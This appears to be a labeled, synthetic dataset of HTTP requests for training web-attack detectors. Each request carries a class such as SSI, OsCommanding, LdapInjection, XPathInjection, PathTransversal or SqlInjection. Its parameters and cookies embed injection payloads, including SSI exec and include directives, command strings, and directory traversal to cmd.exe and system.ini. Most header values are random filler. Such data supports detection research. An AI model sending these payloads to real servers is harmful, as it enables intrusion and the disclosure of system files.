UA-Color: color8
UA-Pixels: 389x154
Via: HTTP/6.8 www.oeAoDdn.jpg, 2.5 97.136.49.86
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44179
Start - Id: 39763
class: SSI
GET /bscs70oihoesiaimnjp/2efeouoaniRnit1onus/8Br/u.3SgLtpwXf2/o9NI/zt/n_Xf4e5/s.KPGU/zj/ggKBaifqh/mx@.exe?qn1=5679435&ihhBy2htro=92615101&ScaiyqEiph6m2=eanftpcmded&agehcej9=iR%407cKe&a6Kg9q9u4wgetx=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.1
Host: 168.162.78.28:24
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 39.180.8.168
Cookie: seTwaq=5;5r=dear;bs=Nao;9zetcI=ndrzstyleinsert9access_logaeka
Cookie2: $Version="565"
Date: Fri, 15 Jul 05 12:40:32 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: n5nSosn=i2ymhp;hNortnNe=sseexcj
From: ue5Iadae@vsTB2l.net
If-Modified-Since: Wed, 11 Jul 07 22:55:45 UTC
If-Unmodified-Since: Fri, 14 Oct 05 19:19:52 UTC
If-Match: "9j6uioXr@8wsH3TKG1_"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: Thu, 05 Jul 07 06:36:44 GMT
Max-Forwards: 96
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bm43Z0wzMGl1dXlhZXRhZFRPM0hjYXI2dXM4ak52a3BuYVR4
Authorization: Digest algorithm=MD5
Range: 42-82,601-32,-86
Referer: /ubdn/kVnr0oze/snxua/rslrttn9/cti6uct.gif
TE: deflate;q=0.2,trailers,deflate
Trailer: Trailer
User-Agent: noyiTw/9.7.8.6.0
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 1.3 www.Qrhtldw.js, 3.1 www.3agkmt.htm
Transfer-Encoding: compress
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39763
Start - Id: 43337
class: OsCommanding
GET /5twP/n__/UMKoZE5/ynpO37jeetheetd/6fptoEfintdopa/Utsma/nqK10tDOvj-/bENxP4Z/eySd/5nG/oiuee60sttfheasr3uI.exe?ma=mail+h3net%40uk9b.ffech7i.gov%3C%3C++++%2Ftmp%2Fwu.c+++++%3B&vtlH3socasqnNeh=odw.sajfS&ddeXxsgaws=%3A0d&egnivlcyenl8aa=6w1o45atat%3C&s8k=hSslogs&dh=mUi5&awiuz9pLibu24=ny6DGSsr%40Qz&eetj=tqwMvlZhjDt&s66ihTeNt4em=tF0 HTTP/1.0
Host: 247.160.203.211
Connection: close
Accept: */*;q=0.1
Accept-Charset: big5, euc-cn;q=0.2, gb2312;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=71533
Client-ip: 72.77.48.25
Cookie: E0aiefsC5txnf=032004;etew8u9E9t4ei=kVR4FBEI;sH=aTc;A5S7g=between/uchildjR;vhf=5231
Cookie2: $Version="529"
Date: Sat, 12 Jun 04 15:41:35 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: "H48NNn4tfizPk@HPB"
If-None-Match: *
If-Range: "4.JV.yFYeE-kl2@q2"
Max-Forwards: 26
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM enJvaHVucXplRnN4ZnRlZWVkMzhwZnQ4cjJqeXRhaDlxdDAyZQ==
Authorization: Digest nonce
Range: -3
Referer: http://ineoe.com/lweh/mdot/zewe/alee4.msf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: obhat3i/9.5.9.7.9
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4509x153
Via: FTP/3.3 208.6.189.152, HTTP/5.9 165.40.30.117, snLye/6.7 www.enNtyeta.htm:556
Transfer-Encoding: deflate
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43337
Start - Id: 39077
class: LdapInjection
PUT /cgadTsOYR442jFS/m-7jj9WUFV7Z/n5@7w3M6dD1hv7KaPQ/nhgejwsp1n0sEo/aE36Ap/ukocej/J6cyu2orpositionS_jhq.mdb? HTTP/1.0
Content-Length: 95
Content-Language: bEMapi,utatc
Content-Encoding: deflate
Content-Location: http://www.elhuil.st/tWrpi/Kalanco/jgli/lttdeLen/7ltr.shtml
Content-MD5: OWRCaGtja2NybHNuZ2VqOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Aug 06 19:31:54 GMT
Last-Modified: Sat, 26 May 07 13:19:49 CET
Host: 28.113.113.202:20
Connection: tiepzo
Accept: */*
Accept-Charset: shift_jis;q=0.3
Accept-Encoding: *
Accept-Language: e-bwl
Cache-Control: min-fresh=2889
Client-ip: 220.211.201.119
Cookie: 9Aftru7tv=ped1)(    |    (edtn=*);eNdiFcnoyfrOmu=e6ec;fnsiose=yrhbshorriLabs;rlOrlatrrgiz= deosll+dig'daaeIw1e;annagSrRcsfne=058619
Cookie2: $Version="700"
Date: Sat, 21 Apr 07 20:02:43 GMT
Expect: 100-continue
From: emCpna@Taya.fr
If-Modified-Since: Thu, 20 Nov 08 23:24:04 UTC
If-Unmodified-Since: Thu, 15 Oct 09 20:30:49 UTC
If-Match: "SvZR770MhglJIM8lBVYl"
If-None-Match: *
If-Range: Tue, 13 Sep 05 15:48:47 GMT
Max-Forwards: 5613
MIME-Version: 9.6
Pragma: enrdlc='9'
Authorization: Basic dGFleTplbzRhaXRO
Referer: http://www.ttade.it/dhov9dpy.jpeg
TE: trailers
User-Agent: Mozilla/8.1 (compatible; MSIE 4.1; Linux i386; aylbke; qFaS5; rurss)
UA-Color: color16
UA-Pixels: 9422x4154
Via: HTTP/7.6 193.129.254.231, HTTP/7.0 11.115.171.183
Transfer-Encoding: identity
Upgrade: shgeYE/4.5, edMa/4.2
Warning: 186 84.167.55.88 "yOnBOtb" 
X-Serial-Number: 89118020643
----: -----------
~~~~~: ~~~~~~~~~~

nfnsxl=ynF-hFBIFx&0ctdmbreececd=istdino'hd]Pr&e8cthenst1=geoiSlz1&tlhVsooifrt=ls s1teitoh l

End - Id: 39077
Start - Id: 39179
class: SSI
PUT /oN/yt2uattRbouoebt/p5ncXcTMvFCjD_/aOchlt4eertbloAati/8WbMAfCstyle_/hRdFA5gK3YKSUcUI/7xC/M8Ob5zB/mt0eq5a4eaeEEse.html? HTTP/1.0
Content-Length: 140
Content-Language: t1dm8ep,Ez,rkUltt
Content-Encoding: deflate
Content-Location: /hhrgre/e0en/rRaH9baR/newecrgb.msf
Content-MD5: YkN1cmxhb2lkb2lzc2Vybw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Thu, 02 Jul 09 18:22:50 UTC
Host: www.dramttuc.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.1, deflate;q=0.8, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 235.165.190.162
Cookie: eeuxehthnifl=hIfskhgn;idGHoUeU=stSahtaccesYchreplacent;5B11.=ema
Cookie2: $Version="261"
Date: Thu, 01 Nov 07 22:33:50 CET
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-Match: *
If-None-Match: "XIytUbg@i4Zek9twT_h"
If-Range: Tue, 07 Oct 08 16:35:25 CET
Max-Forwards: 7
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Basic YVRhaXI6cWVoYXQ=
Range: -6803,-23
Referer: http://LItuxf.gov/ekDre.msf
TE: trailers,gzip;q=0.0,trailers
Trailer: Pragma
User-Agent: toaohxloet/8.9.5
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: gzip
Upgrade: pnoi/6.7, ita3m/3.5
Warning: 671 www.sNedft4.tiff "aEHyset" "Wed, 16 Apr 08 21:11:39 CET"
~~~~~: ~~~~~~~~~~

8esa9Am=mbhls&mSt=<!--#echo var="date_gmt"-->&1kTzmzlnts06=3htAo&emn=aBFzJ&Tnw=77983&nboohzq2epeil=RhE sagTeb&dre6r=m&s_@zz=YZ

End - Id: 39179
Start - Id: 36119
class: PathTransversal
GET /jVreplaceGnP.png?arssohT=56941064&nhO=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&zsne5wtseh296=te%3C&pYeeraf0t=MzPepene2htfsm2vc&0gnStOj=%2Fy7&sns=6704143&yeeodn=47862537&Ser5=uiepassthru&OEoeah=3789452 HTTP/1.1
Host: 60.66.16.34:91
Connection: osad3r
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip;q=0.6, identity;q=0.1
Accept-Language: tft-NmiEh;q=0.0
Cache-Control: max-stale
Client-ip: 180.199.9.54
Cookie: fhnemnblAn=T+ logskrt;asaaiIeaer=6n;gnodezII=t
Cookie2: $Version="406"
Date: Sat, 14 May 05 24:39:24 CET
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 50
MIME-Version: 7.1
Pragma: pei='eeoweide'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 8-
Referer: /esehe/yAtjfbod/ttRpH/neoria/efMEstoa.gif
TE: chunked
Trailer: If-Match
User-Agent: 8aln/3.1
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/1.8 56.238.245.54:1
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36119
Start - Id: 49966
class: XPathInjection
GET /qej/hlyn9esMM2/qnull@C/raScldifndense/yNbL.asmx?xUQopenexecevalwv=h%40LT&nj=ot&drjhyOi4r=hDl&o4abaith=n%3Ceka%25winnt1Tana3e&imLsaihUje=formbsstE-y%26lTn&e7bEklhAreag5a=u8leE%25s&kqahceolti=mhttpcx3wmtpassthru1a5wm&r5Enr=mssbetweenAoizoteae%27&e6=r%2F9etO%2Fmt%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D93%5D++%7C+Th%2Fi1%2Fuf9swc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D046%5D+++or+%27eEcog%27+++%3D+%27&e.Vwk8tr_QX=tYresnullppnr%2Bi&pat2FJioNagT=rahwattufntaotr&Ramn7Obo=4354464&dx=afsam&QQwyaXT=2525 HTTP/1.1
Host: 14.46.98.255
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, compress, compress;q=0.2, compress, compress;q=0.8
Accept-Language: gaeeaEo-ryeoeat, olyfge-duaaen;q=0.3, eati8o-vteyEbee;q=0.2, h0-Nnvflbv, 4icme4-leerU
Cache-Control: no-transform
Client-ip: 253.50.154.77
Date: Wed, 26 Jan 05 21:29:30 UTC
Expect: ahthray
If-Modified-Since: Sat, 07 Aug 04 19:14:26 UTC
If-Unmodified-Since: Tue, 07 Apr 09 10:57:19 GMT
If-Match: "sHiQSfYOv5ma6Q5"
If-Range: Sun, 14 Aug 05 13:04:39 CET
Max-Forwards: 58
MIME-Version: 2.7
Pragma: se='lWyd1'
Authorization: Digest response="fd530FB1f4d6e6B5795Acf09EE08cC4F"
Referer: http://ybop4f.be/8uvb/oiee/Dt6inme/9oTZ39.shtml
Trailer: Accept-Encoding
User-Agent: loeoen (tvfvfTJmn; nF-Gi1P6)
Via: eon/8.4 118.143.237.205

null

End - Id: 49966
Start - Id: 35537
class: XPathInjection
POST /n2eog/Dixp_@/evnkuhroaeoih/niYt6itti0Aa.dll? HTTP/1.0
Content-Length: 214
Content-Language: v,s,u
Content-Encoding: compress
Content-Location: /idom.jpeg
Content-MD5: Y2VlbGFhb2VlbnI2aG1paQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Oct 05 14:26:31 CET
Last-Modified: Mon, 13 Mar 06 06:07:47 UTC
Host: 166.230.214.204:50613
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1250;q=0.4, windows-874;q=0.2, cp-936;q=0.7, utf-7
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 0.8.80.214
Cookie: hb=uektn:tsnn|g;bvfe6onQmWReeU=t12Zz--BL1
Cookie2: $Version="80"
Date: Mon, 20 Feb 06 15:35:52 UTC
ETag: "gXOT@1LT1XonrRqHV.s"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Sun, 20 Jan 08 13:06:43 UTC
If-Unmodified-Since: Thu, 31 Jan 08 20:53:42 CET
If-Match: "6eCNHQzjAurm-N8pVwI7"
If-None-Match: "-M4BiRbKBQUE.AaHz"
If-Range: *
Max-Forwards: 90
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Basic ZjBxb1I6dGlhRWV0ZDY=
Range: 7-26018,971548-,-1
Referer: /gn7cao/nr5n/a7S5xut/s3td7op.jsp
TE: trailers,chunked
Trailer: Host
User-Agent: inntizb0td (69HhamZa; na@--d; hX5qDB; e.EDbd0ERb; e8ChWdVmN)
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: lxIca; hcDG=eeo5
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hqEatpnibeuottd=8-i&lotlue2dhne=plO'    or     6     <     count(path/child::*)    or 'nsmrxt' =   '&ee8jhenaglot=861&rYyreutehgfo=knLQScxJ&grp= &OaNtTSsbnnFleou=35&l4h4s=9888417&0Y0D8=3221676

End - Id: 35537
Start - Id: 39083
class: LdapInjection
PUT /n-DoU.rsQuA/sr4M/04oQL5j.TN0hgmB9/osln.css? HTTP/1.0
Content-Length: 111
Content-Language: mtrREf,as,daenx
Content-Encoding: deflate
Content-Location: /atsx/77cg/cOod/3srsl.gif
Content-MD5: dDRldGt1MWx0b3NrZWwybw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Nov 04 01:47:28 CET
Last-Modified: Sat, 22 May 04 01:44:54 GMT
Host: 19.208.108.249:80
Connection: close
Accept: audio/basic;q=0.0, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.0, identity;q=0.9, deflate, deflate;q=0.6
Accept-Language: l-u, jssdI9et-tts
Cache-Control: max-age=574
Client-ip: 15.45.8.54
Cookie: emlriiaI1Te=s1keGF1H;rtaU1mer=)   (|(displayName=had*)  (name   =had*)(   mail=had*);srhmsdaeLn6e=hs'oat%ez7o
Cookie2: $Version="4"
Date: Wed, 07 May 08 10:12:29 UTC
ETag: W/"g73ApvtYuS1Ny5Wm17@e"
Expect: 100-continue
If-Unmodified-Since: Thu, 03 Mar 05 07:58:28 UTC
If-Match: "sM4GRT4D.Rwfhn1I"
If-None-Match: *
If-Range: Sun, 11 Nov 07 07:17:14 GMT
Max-Forwards: 44
Pragma: no-cache
Authorization: Basic aGllazpmaGFz
Range: 5646-401977,1107-6680,-60
Referer: /cDmtie/yson7/etnlb/tdd8.dll
TE: chunked;q=0.9
Trailer: Expect
User-Agent: Mozilla/1.3 (Machintosh; U; PPC Mac OS X 3.1; no-em; rv:9.0.6) Gecko/49770993
UA-OS: Windows 98
UA-Pixels: 455x2330
Transfer-Encoding: compress
Upgrade: 9kB/3.7, xeb/2.9, hIe/8.5
Warning: 553 253.145.241.182 "ehdterdEEttm" 
----: ------------------------------------------

Z7ienniew4ha=0031350&di=m4hed41nA3t1e0Nbo&utdEu=ocnMnm&ire=361&zl=MwesnhOohzn&g9iPnl5nuz=bw~http+stby&ai=68

End - Id: 39083
Start - Id: 37617
class: LdapInjection
PUT /wvtBtS5refdr/Iae1zn/peeo4mp6trqs/1w8Xu5/ya/1WHy6CO8jYKSBH/httpo5ftptmpVservicesJ/g641vln/ogiloav/m_@Sj3hOQacatx/7OHa/2520M2C8ruoermpBl9a@.jpeg? HTTP/1.1
Content-Length: 222
Content-Language: Nf,rnee,niE9hlc
Content-Encoding: deflate
Content-Location: http://www.8tn7tb.net/8simTo.asmx
Content-MD5: bmF1TjNyamxjZVcxY3VoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 06:40:26 GMT
Last-Modified: Wed, 16 Jul 08 22:54:10 UTC
Host: 49.35.169.162
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.6, windows-1255
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: ee='eytrseue'
Client-ip: 109.56.227.8
Cookie: pre7dI7ekttnt7=nleo
Cookie2: $Version="800"
Date: Thu, 02 Oct 08 24:33:32 CET
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Wed, 02 Jul 08 15:14:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.1
Pragma: wpB73s=a
Proxy-Authorization: Digest username="pitaah"
Authorization: NTLM dDhiNmVyYmFrMmJvdWVyMU9xaGl0c28wdW5lWXJldDZlN29hbmwwaWE=
Range: 9-3321,97916-131
Referer: http://e9grwtns.org/e5ciea.aspx
TE: trailers
Trailer: Accept-Language
User-Agent: dejrkek/8.1
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 770x317
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ayMee=Ap7OHisystemh&;wzonbprocessing-instructiono1&JzhtpasscRecho7=980&atWAT=734&dteG=aDPMY&nhisthciyoeh=ybtE&dir=iracceptta&tole=hsHG&BP1CvN4S=eLUwCEGSkiD&--iCcatCS_mz=")(targetfilter=(o=NetscapeRoot))

End - Id: 37617
Start - Id: 49490
class: XPathInjection
GET /ili0/Ea/mwNoneoSnsesdse/wrnlwjTqottm3/aUhRuK@.shtml?taocitahd=bvgB.5gwNm7c&2bmh=3078255523&evemtoSa=52942&tmodnPqt=74552&w8nnottiiodorh=afi%2Fase%2FcatkmC%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D597%5D++++or++++%275ritsahn%27++%3D+++%27 HTTP/1.1
Host: 144.209.94.48
Connection: Ormwioeo
Accept: application/*;q=0.3, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7790
Client-ip: 243.204.148.120
Cookie: bnn=a;XLTZUk=rsevniTTa4ue;nhsOasDsmote=a@o;u2dPROeysf=tli0X6lotOney;uunejunyn=Wnwsaileiewd7fs;.MHe@delete=dussgjrnClr
Cookie2: $Version="467"
Date: Wed, 22 Sep 04 03:55:06 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: zimlrze=7x4eo
From: sryguohs@efdmr.biz
If-Modified-Since: Mon, 21 Jun 04 01:02:42 UTC
If-Unmodified-Since: Tue, 05 Dec 06 22:13:41 CET
If-Match: "0X.yeUKlGwFJoKNR1t"
If-None-Match: "Fwb2yib9RoPO8QDEW0me"
If-Range: "7-a8uyyKzeZr_c4Utg"
Max-Forwards: 8565
MIME-Version: 4.4
Pragma: das2eea='eht'
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: tksie nsgtt=i6hCf4m
Range: -012
Referer: http://www.jn2nr.biz/jt0tif/lherj/ol5LAm/oOixhe.php3
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: 38UfEm2lFG http://www.PAaf.org
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 029 152.191.219.235 "iowd" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49490
Start - Id: 42410
class: SqlInjection
GET /t_mcFunvXSX.asmx?EsoosoW=9&4wmodz=OR++%27espir%27+IN++++%28++%27++%27++%29&sieddatPli=wrl%3Coatxservices HTTP/1.1
Host: 49.71.96.19
Connection: close
Accept: audio/x-wav;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 8yzsp-tkaa, ta0ut2re-T;q=0.8, dv-uhA, 6l4oreit-te
Cache-Control: only-if-cached
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Sun, 15 Aug 04 03:18:08 UTC
ETag: "3Txo73O3VxszwEa72Y_"
Expect: Tahmn=doenmd8;ia1we=hznovtrd
From: 1tXiees@Csgv.st
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sat, 16 May 09 16:55:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -975727,63980-89,80-3
Referer: /aroftUR5.php
TE: chunked;q=0.7
Trailer: Host
User-Agent: yoL@5xp4C http://www.edoye.be
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: identity
Upgrade: 2ac/9.1, rwme/4.7
Warning: 321 133.114.70.22 "eluta" "Thu, 01 Dec 05 01:44:32 CET"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42410
Start - Id: 40050
class: SSI
GET /og9JacTE/hSP/J8srbeidy/seyO/zK0B/ntXw4aPceBj.2a.html?scriptFCF_Xreplace=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fls+-l++%2Fhome%2Feee9Ain%2FgLicguP%22+++++--%3E HTTP/1.1
Host: www.gr3dt6.be
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 80.3.170.218
Cookie: aToelwx6eDnio9h=9IK-QeijdRJ_;EllnAeo2b=jMV8q9ygpC;ogn5asEl=uneT2mnodestdin7ttL>;uz-9lLmailicsecho=lttls;QDy.f=wbvhu
Cookie2: $Version="977"
Date: Sun, 28 Dec 08 02:28:40 CET
ETag: W/"_YyATWc.DaW8pqMUzOx"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Sun, 25 May 08 17:45:44 CET
If-Unmodified-Since: Mon, 03 Nov 08 15:01:31 GMT
If-Match: *
If-None-Match: "X8V@lzT2U6VFNOzvHy"
If-Range: "u5tNej2ZaGie-in"
Max-Forwards: 3161
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: Basic YWlpYU50VDpqbTNlZTdwcQ==
Range: 271-,17364-
Referer: http://iztpotB.be/veeAtic/onid/eeitu/oeacta/ueatnee.zip
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/6.0 (X11; U; Linux i586 8.0; or-pe; rv:8.7.1) Gecko/09930035
UA-CPU: MIPS
UA-Disp: 490,576,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4665x776
Via: munr/7.3 161.214.68.211
Transfer-Encoding: compress
Upgrade: cGu/7.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40050
Start - Id: 36741
class: OsCommanding
GET /KCEjTLFCji04.f/eralsw1c.html?sbDNC=uwgetsdtyigsq&dlsh=3733263086&JduA.Zo=roperlreplaceRsposa1%3D+4ld&o3h6s=426388&km8yxofYY=%2Fperl++++%2Ftmp%2Fta.pl+++++-p5389&f-8Bs1yEz=o+lBe%26uestdinxnox&rgZtsos=yayXa.EM- HTTP/1.1
Host: www.shsLc.ch
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: baIy-abn5, eecAi-oi63rtr
Cache-Control: min-fresh=62
Client-ip: 114.229.84.195
Cookie: pejwwsnroiti6e=itshecalr5xtermtedocument;GVuhmocha=0;utodhtxibntotoe=guss
Cookie2: $Version="70"
Date: Sun, 06 Mar 05 22:50:01 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Sun, 13 Apr 08 19:48:54 CET
If-Unmodified-Since: Thu, 06 Sep 07 22:04:30 CET
If-Match: "Bzp4oCgH-jAMrEt"
If-None-Match: "jCQ.nuPqlOxdDxD"
If-Range: Tue, 11 Oct 05 05:17:18 GMT
Max-Forwards: 0988
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: Digest response="6eAEeC1c77C470AcDca6aE6CaA0D1D4f"
Range: 87-896750,1933-,495454-79783
Referer: /9dasT/L2sg/slrFU/tsdwrs/eezo.gz
TE: gzip;q=0.2
Trailer: From
User-Agent: eyWCfmiUkW http://www.luysd8.it
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1003x5848
Via: uwoe/8.8 227.139.112.151
Transfer-Encoding: gzip
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36741
Start - Id: 43876
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 209.193.184.94:80
Connection: Ialirere
Accept: text/*, video/quicktime;q=0.3, image/png
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Sun, 22 Oct 06 04:39:51 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sun, 29 Feb 04 24:28:01 CET
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 6
MIME-Version: 1.9
